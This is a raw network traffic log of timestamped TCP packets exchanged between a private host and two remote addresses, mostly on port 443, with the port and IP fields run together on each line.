                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:01.994014025 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:02.113735914 CET44349773116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:02.113810062 CET49773443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:02.113856077 CET44349773116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:02.113902092 CET49773443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:02.113912106 CET44349773116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:02.113972902 CET49773443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:02.114589930 CET49773443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:02.114633083 CET44349773116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.062009096 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.062041044 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.062205076 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.062313080 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.062324047 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.424760103 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.424846888 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.425257921 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.425278902 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427145004 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427158117 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427217007 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427239895 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427253962 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427264929 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427290916 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427304029 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427369118 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427392006 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427428961 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427447081 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427499056 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427499056 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427525043 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427548885 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427582026 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427639961 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427669048 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427675009 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427706957 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427783966 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427812099 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427913904 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427932978 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427953959 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:03.427990913 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.475239038 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.475368023 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.475811958 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.475821972 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477179050 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477184057 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477247000 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477262974 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477272034 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477274895 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477350950 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477370024 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477381945 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477391005 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477401018 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477411985 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477682114 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.477793932 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478240013 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478269100 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478291988 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478310108 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478421926 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478445053 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478461027 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478468895 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478492975 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478509903 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478581905 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478596926 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478607893 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478617907 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478627920 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478652954 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478714943 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478734016 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478802919 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478866100 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478903055 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478920937 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.478955030 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.479031086 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.479091883 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.479144096 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.523327112 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.523742914 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.523773909 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:04.567370892 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:05.240427017 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:05.240535975 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:05.240556955 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:05.240612030 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:05.240613937 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:05.240669012 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:05.241894960 CET49779443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:05.241906881 CET44349779116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.118645906 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.118690014 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.118969917 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.119023085 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.119038105 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.676457882 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.676628113 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.676640987 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.676687002 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.677467108 CET49785443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:06.677480936 CET44349785116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.247174025 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.247260094 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.247368097 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.247576952 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.247613907 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.610326052 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.610662937 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.611332893 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.611360073 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.612762928 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.612763882 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.612790108 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.612829924 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.612946987 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.612946987 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.612976074 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.612998962 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613039970 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613051891 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613162041 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613339901 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613500118 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613585949 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613627911 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613702059 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613728046 CET49791443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613765001 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:07.613873959 CET44349791116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.667568922 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.667654037 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.672015905 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.672032118 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.673827887 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.673837900 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.673891068 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.673908949 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.673916101 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.673922062 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.673949003 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.673964024 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674031973 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674062014 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674087048 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674112082 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674144983 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674165964 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674196959 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674212933 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674237013 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674274921 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674309969 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674457073 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674484968 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674501896 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674530029 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674535036 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674552917 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674607038 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674619913 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674638987 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674650908 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674685955 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674696922 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674710035 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674732924 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674838066 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674887896 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674915075 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674940109 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674964905 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674977064 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674984932 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.674999952 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675009012 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675017118 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675028086 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675044060 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675062895 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675072908 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675095081 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675134897 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675146103 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675163031 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675182104 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675247908 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675277948 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675290108 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675348997 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675350904 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675371885 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675411940 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675468922 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675575018 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675590038 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675645113 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675682068 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675709009 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.675750017 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.719330072 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.719770908 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.763339043 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.920063019 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.920228004 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.920275927 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.920413971 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.959738016 CET4972480192.168.2.42.20.68.201
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.963355064 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:08.963624001 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.011370897 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.041435003 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.041579962 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.041598082 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.041687012 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.041723967 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.041757107 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.041784048 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.041877985 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.079936028 CET80497242.20.68.201192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.080077887 CET4972480192.168.2.42.20.68.201
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.083349943 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.162378073 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.162533998 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.162616968 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.162741899 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.162822008 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.162944078 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.163064957 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.163170099 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.163188934 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.163300037 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.163331985 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164062023 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164099932 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164187908 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164252996 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164290905 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164386988 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164482117 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164568901 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164622068 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164657116 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164738894 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164841890 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.164926052 CET49797443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.165194988 CET44349797116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:09.165302992 CET44349797116.203.12.241192.168.2.4
